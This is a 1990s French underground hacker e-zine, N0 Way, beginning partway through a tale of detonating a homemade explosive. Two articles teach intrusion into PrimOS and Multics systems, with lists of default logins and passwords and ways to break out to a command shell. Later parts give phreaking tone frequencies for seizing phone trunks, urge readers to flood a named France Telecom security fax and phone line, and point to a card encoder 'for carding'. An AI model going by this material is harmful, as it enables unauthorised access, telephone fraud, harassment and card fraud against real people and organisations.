telecoms. J'allume la meche et je me retire mine de rien. De toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave, un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres. C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir. A bon entendeur, salut !... By Inlandsis. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.15 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP Issue 1 Phile 3 [NeurAlien] 13/01/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= /@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\ @/ \@ @ Prime & the PrimOS Environment @ @ @ @ par @ @ @ @ NeurAlien @ @\ /@ \@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/ Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de traitement lourd et l'ordinateur de gestion de conception plus legere. Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire. Il est multi-utilisateur et possede plusieurs modules des l'origine: un module Basic, un autre de programmation pseudo-shell (batch) etc... Le prime possede de nombreuses failles de securite. Notemment dans le programme tour. >L'acces au Prime: ================= L'acces au Prime se fait par une base d'acces d'o— l'on peut lancer des commandes de pre-login appelee PrimeNet. C'est en fait comme un service d'accueil et de dispatching avec une machine par defaut. Les prompts utilis‚ par le systŠme de pr‚login sont 'OK' et 'ER!'. 'OK' est affich‚ en premier, si vous tapez quelque chose d'incorrect, le Prime vous r‚pondra par un 'ER!'. La banniŠre ressemble a : "Primenet V2.3" Un message souvent vu sur Prime est: Please Login ER! Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper login: Primenet V 2.3 (system) LOGIN (vous) User id? (system) AA1234 (vous) Password? (system) KILLME (vous) OK, (system) La principale commande etant bien s–r login. syntaxe: login [] [] [-ON ] [-PROJECT ] Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger sur une machine autre que celle par defaut sans pour autant avoir a se logger sur la machine par defaut. Il vaut mieux essayer plusieurs logins par la commande login comme ca vous avez 3 essais au lieu d'un essai. >Le systeme d'exploitation du Prime, PrimOS: =========================================== La version actuelle de PrimOS doit etre la 22 ou la 23. >Les commandes d'utilisation courante du systeme: ================================================ status users \_ : Affiche la liste des users, leur origine, leur etat us / all \_ : Affiche des infos sur toutes les activites du al / systeme comm : decrit les controlleurs de communication et leurs etats respectifs. devices : donne des informations sur les peripheriques disks \_ : donne des informations sur les disques di / me : donne des infos sur soi meme. network \_ : donne des infos sur les differents noeuds du reseau net / PrimeNet. project \_ : donne des infos sur les projets sur users pro / system \_ : donne des infos sur le PrimOS en train de tourner. sys / semaphores \_ : donnes des infos sur les semaphores actives se / units \_ : donne des infos sur les units ouverts un / listf \_ : donne le nom du dir, le peripherique et si on a des l / ACLs dessus ou non. slist : affiche le fichier a l'ecran login [] [] [-ON ] [-PROJET ] : ouvre un log sur la machine specifiee ou definie par defaut avec le password et le projet specifie ou par defaut. date : affiche la date et l'heure time : affiche les valeurs du registre de temps partage: . connect time : temps depuis le login . compute time : temps d'utilisation de programmes . I/O : temps d'utilisation d'un Disk, Controlleur de comm ou Device. >Les communications: =================== Les communications x25 se font par l'intermediaire de netlink qui est un programme de communication. on l'appelle comme suit: netlink Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'. Ici vous pouvez tapper diverses commandes: c : : appelle en collective call le NUA nc : : appelle normalement le NUA >Les logins par defaut: ====================== User ids: Passwords: --------- ---------- Admin Games Tools Rje Netman Cmdnco Demo Regist Prirun Telenet mail mail prime prime / primos primos_cs prime / primos Primos primenet primnet mfd mfd fam fam / Ver. 18 Primos \ system system < et en dessous > dos dos \ --------- / tele tele netlink netlink test test guest guest guest1 guest1/guest >le mot de la fin: ================= Ya pas mal de systŠme Prime qui sont encore TRES ouverts … tout type de p‚n‚trations (hahaha). Alors pour les bons petits PADs tranquile, c'est kewl! NeurAlien. ------------------ S0, G0 0N wif N0 Way ! -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.16 <<>> <\ Rave Revolt /> <\ \> <<>> - PART I - Arggghhhhhhh!!!!! C'est le cri de la bete qui se reveille! NON, je n'y crois pas, ce que je redoutais est arriv‚: ce havre de repos qu'etait le pont de Tolbiac a ete viol‚. Le sanctuaire a ‚t‚ profan‚ par de sales CRS baveux et grognants avides de baston. C'est vraiment le genre de trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers simplement car c'‚tait pas d‚clar‚. Encore cet encul‚ de Pasqua qui s'est dit: "Hey merde, ils s'amusent bien l… bas et ils sont pas emmerd‚s par les flics car ils ne gˆnent personne". Solution: hop, on se renseigne avec les RG et autres encul‚s civils puis on leur envoie les CRS. Bravo pour les m‚thodes... C'est d'une finesse.... Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a d‚ranger les afters: RI-DI-CULES ! Il paraitrait mˆme qu'il est question d'interdire les raves au plan national. La va falloir se secouer car les raisonnements pr‚c‚dents ne peuvent plus s'appliquer: on pensait que l'interdictions des raves commerciales permettrait … l'underground de se developper. Que nenni, ils s'attaquent directement … l'underground! Quelle sera la prochaine ‚tape? L'interdiction de TNT? L'arrestation des organisateurs des raves? (ca serait pas un mal pour E+ et d'autres...) Il va falloir r‚agir contre toutes ces pouss‚es s‚curitaires et anti- d‚mocratiques. Nous y contribuons d‚ja en diffusant No Way un peu partout! - PART II - Le Teknival UFO 23 du massif central a lui aussi ‚t‚ gŠn‚ par les keufs une nouvelle fois. Au d‚but, tout se passait bien: le Teknival avait ‚t‚ install‚ dans un champ prŠt‚ aux organisateurs par un agriculteur du coins. Tout se passait bien, a des kilometres des habitations. Pourtant, il y a eu DES PLAINTES. Les gendarmes venaient … l'entr‚e du champs presque tous les jours pour se renseigner auprŠs des organisateurs. Le maire voulait virer le teknival de sa commune. Le maire biensur n'y est pas arriv‚. Ils ont donc transmis l'affaire au prefet etc... Bref, comment faire chier pour rien les ravers qui ne g‚naient personne. On se balade dans le Teknival, a la recherche de bois pour le feu ou de feu pour nos tˆtes ;) et … chaque fois on entendait: "Il parait qu'ils vont envoyer les CRS". De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre ces personnes mal avis‚es se sotn permise de filtrer … la fin du Teknival l'entr‚e au champ, ne laissant pas entrer les gens mais les laissant sortir. Le champs s'est ainsi "vid‚" au fur et … mesur des voyages. La mˆme ‚ternelle question se pose encore, Mais que veulent ils? ++N. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.17 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP Issue 1 Phile 5 [NeurAlien] 14/01/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$ $$ $$ $$ Multics par NeurAlien $$ $$ $$ $œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$ Multics est encore un de ces OS depasses, vieux, obsoletes mais encore vivant sur quelques coins retires, hameaux eloignes et ruraux de la technopolis galopante que sont actuellement nos grands centre informatiques. Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France. (et puis aussi: Le ministere de la Culture et l'INRA.) Multics est la source d'Unix. C'est un peu comme le pere d'Unix. C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite, d'une organisation et d'une praticite telle que l'on se demande pourquoi cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete temoins est la 12.0 je crois. Le systeme est tres vaste donc ce texte ne sera qu'une presentation de Multics. 1 Reconnaitre un Multics: ------------------------ Au login, la pluspart du temps, quand on se connecte sur un Multics, il affiche: MULTICS version MRxx # o— xx est le numero de la version Channel dhyyy at hhmm.s # yyy : canal de communication # hhmm.s : heure format militaire up since hhmm.s # date du dernier boot. quelques autres informations et puis plus rien: c'est la periode de prelogin. 1.1 Prelogin: ------------ Si vous connaissez les Cyber de Control Data Corporation comme les CDC960, CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode de prelogin. Celle ci est generalement limitee (environ a 2mn). Le prelogin comporte plusieurs commandes primaires sous Multics: help l et d'autres commandes de login anonyme sous un projet. En effet, la gestion des utilisateurs sous MULTICS se fait par projet. Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point de vue gestion. On designe un compte comme cela: . Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste le . Dans le dernier cas, le programme de login va detecter a quel projet appartient cet utilisateur. Une fonction interessante est la fonction de login anonyme. En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce projet. La syntaxe de cette commande est donnee au prelogin par le message de la commande help. 1.2 Les principes: ----------------- * Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte fait toujours partie d'un groupe appele 'projet'. On peut donc se logger anonymement sous un projet sans avoir de nom de compte. On sera donc identifie comme anonyme du projet xxxxx. Un user peut faire partie de plusieurs projets. * Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule. * Un 'segment' est le nom donne sous multics aux fichiers. * un chemin est indique non pas avec des slash ('/') comme sous unix mais avec des signes superieur: '>' ex: >udd>PROJET>User * le directory >udd> est le directory qui contient toutes les infos concernant le utilisateurs. * Se deplacer dans l'arborescence: Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans '>udd', il suffit te taper 'cwd <'. Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans '>udd>PROJET2>user1', il faut taper: cwd : aide en ligne ls : liste des fichiers sur directory courant cwd : pwd afficher le nom du directory courant cd : creer un nouveau directory dans le directory courant dl : effacer un segment who : affiche un court message sur l'etat de la machine et affiche la liste des users actuellements connectes sur la machine. whom : meme chose mais en classant les utilisateurs par projets. sm : envoyer un message a un utilisateur online (equivalent a write sous unix). sdm : envoyer un courrier a un utilisateur. Si la machine est connectee a un reseau comme Internet, pour envoyer un mail a scc@nic.ddn.mil, il faut taper: sdm scc -at nic.ddn.mil rdm : lire sa boite aux lettres. memo : systeme d'agenda tres evolue. pr : affiche un segment a l'ecran. ted : editeur ligne a ligne type ED. emacs : editeur pleine page que vous connaissez. l'utilisation de cet editeur est impossible avec une liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca! basic : appel du compilateur basic. pascal : appel du compilateur pascal. calendar : affichage de calendrier. date : affiche la date. time : affiche l'heure. st : affiche le statut d'un segment ou d'un directory. la : liste des droits d'acces sur un segment ou un directory. sa : etablit les droits d'acces sur un segment ou un directory. logout : quitter Multics. crossnet : envoyer du mail a travers differents r‚seaux. 2 Subversion: ------------ Par la methode de login anonymous, nous pouvont subvertir MULTICS en reperant par un acces public qui est sous un certain projet. Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi, MULTICS affiche en debut de connexion des infos dont le projet. Il suffit ensuite de faire un login anonyme sur ce projet. Deuxieme methode. Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le programme. Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN. Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande. Methode traditionnelle: Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke) N'oubliez jamais que le permier caractere de Username doit toujours etre en majuscule. Essayez les entrees communes. ex: SysDaemon (celui ci, je l'ai jamais vu 'open') 3 Then... the end: ----------------- Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet et tellement peu repandu, que ce serait de la perte de temps de vous expliquer tout si vous n'avez pas de becanne pour tester. So long HPC[A]s men. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.18 :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8) ?) Tel - Trixx |) @) By %) B) NeurAlien I) :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8) - 7 Septembre 1994 - "A new race of hacker seems to be born, Ultimate Hackers" --Anonymous Hohe les Hack/phreakERS, les telcos ‚voluent et nous aussi. En exclusivit‚ quelques news d'un peu partout dans le monde qui vont vous faire sauter au plafond. Tout d'abord la HOPE (Hacking On Planet Earth) s'est d‚roul‚e dans le chaos le plus complet. Il y avait beaucoup de "well known hackers" et quelques ‚vennements interressants s'y sont d‚roul‚s. (Knight Lightning & Taran King molestent (tentent tout au moins) une fille pendant qu'ils discutent avec Win Schwartau et Agent Steal) L'unix mis a disposition des participant a ‚t‚ hack‚ comme on pouvait s'y attendre. ("Hey Razor, have a look at them... It could help... - Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You hacked my system?") Le nouveau systeme du m‚tro de new york qui constituait le deuxiŠme d‚fi aux hackers a lui aussi ‚t‚ vaicu. Il paraitrait (je ne l'ai pas vu) que la personne l'ayant hack‚ soit actuellement recherch‚e. :) (Fucking Pigz, GET A LIFE ! ) Au niveau des * Boxes, ca a fonctionn‚ dur apparemment dans une folie d‚moniaque. Certains pays semblent avoir ‚t‚ ouverts et une effervescence chez les phone phreaks semble confirmer les bruits de grands "breakthrough" en matiŠre de phreaking. (R2 etc...) Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines d'appels par semaine sur SecTec. La nostalgie des anciens fait toujours peur aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !) Allez, un ptit amuse gueule pour les lecteurs de N0 Way: Frequences pour la malaisie: Key Forward: 2600 + 2400 Hz : 150 ms Between: 2000 ms Seize: 2400 Hz : 150 ms Intervals: 150 ms CCITT5: ====== Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic: CCITT 5 serait utilis‚ au : Chili, Philippines South Africa Colombie Bresil Essayez pour voir si ca passe... Bribes r‚colt‚es un peu partout: =============================== Saviez vous que GN Navetel fournit … la gendarmerie Canadienne des solutions pour ecouter les transmissions de donn‚es et plus particulierement: - les comms modems sur les BBS jusqu'au vitesse 28800. - les comms satellites vers Taiwan & Singapour envoy‚es … 2Mbit/s aux satellites par des "emissaires" de ces pays. Afrique du Sud: ============== 2400/2600 puis 2400 Timings: 150/0/90/0 toujours en ms bien s–r Chili: ===== 2400 ou 2550 pendant 3 secondes seize: 2400 (ou 2460) The recent hack: =============== Net23 viens de se faire pirater. Net23 est un bon IP provider … New York. Son administrateur qui a juste 15 ans ‚tait plutot vert. Well... qu'est ce qui a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps? Bref... pas kewl pour lui. R2: == Pour seize'r un trunk en R2, il faut envoyer: 2040/2400 OU 2400/2400 ou == ou 2280 2280 ou ou 3000 3000 Nouvelles de l'arm‚e: ==================== L'arm‚e francaise a un beau reseau TCP/IP interne. C'est tres joli et c'est dur d'y acceder. Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION: des entrees avec root sans mot de passe! tftp actif sur toutes les machines ! rexd en standard sur tous les HP. Vous voulez vous marrer, essayez de votre caserne pref‚r‚e ! :) Quelqu'un … faire chier: ======================= Service de securit‚ de chez... FT: Tel: (1) 44 44 22 22 Fax: (1) 42 68 19 38 Vous avez mon approbation pour donner le 44 44 22 22 comme num‚ro a v‚rifier pour les achats par carte bleue ou num‚ro de rappel pour France Telecom pour les renseignements quand vous etes dans une cabine. Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour envoyer 450 pages NOIRES au 42 68 19 38 ! La blague du jour: ================= "Comment transforme t'on un 486 en un 8088?" "- En installant windows." [Kopyrite Phrack 46] Mag stripe Reader / Coder: ========================= Beaucoup de personnes recherches des lecteurs encodeurs de cartes magn‚tiques. Voila ou les acheter... CPU ADvance Post Office Box 2434 Harwood Station Littletown, MA 01460 USA Fax: 508-624-4819 L'unit‚ coute 389 $ US et il y a 2 modeles: un lecteur pr les pistes ISO 1 & 2 un autre pour les pistes ISO 2 & 3 Hehe.... Bon carding... N0 Way recrute: ============== Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de FT. Si votre oreiller est un Cisco 7000. Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee pour suivre les satellites de l'armee. Si vous ne vous servez que d'une socket en raw IP pour faire du RPC. Si vous vous servez de votre cafetiere pour faire des pates au caf‚ ;). Si vous aimez router vous memes vos paquets en Source Routing. Si vous etes n‚ dans une ‚prouvette de LSD 25. Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les trucs les plus d‚lirant, les plus techniques et les plus ‚clatants. ! Have phun wif that ! ++NeurAlien On to the next one, on to the next one ! ! ! ++N.